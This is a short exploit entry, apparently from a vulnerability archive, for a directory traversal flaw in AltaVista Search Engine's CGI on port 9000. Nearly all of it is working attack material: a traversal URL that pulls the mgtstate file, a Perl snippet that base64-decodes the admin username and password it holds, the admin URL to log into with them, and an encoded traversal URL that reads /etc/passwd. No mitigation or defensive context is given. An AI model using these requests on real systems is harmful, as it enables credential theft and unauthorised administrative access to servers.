|
AltaVista Search Engine Directory Traversal Vulnerability
http://target:9000/cgi-bin/query?mss=../logs/mgtstate (to get the mgtstate file.) #!/usr/bin/perl use MIME::Base64; print decode_base64("$ARGV[0]"), "\n"; (to unencode the username/password) http://target:9000/cgi-bin/mgt and enter the username/password to access the remote administration features or http://target:9000/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd to get the password file on a unix system |
|
Privacy Statement |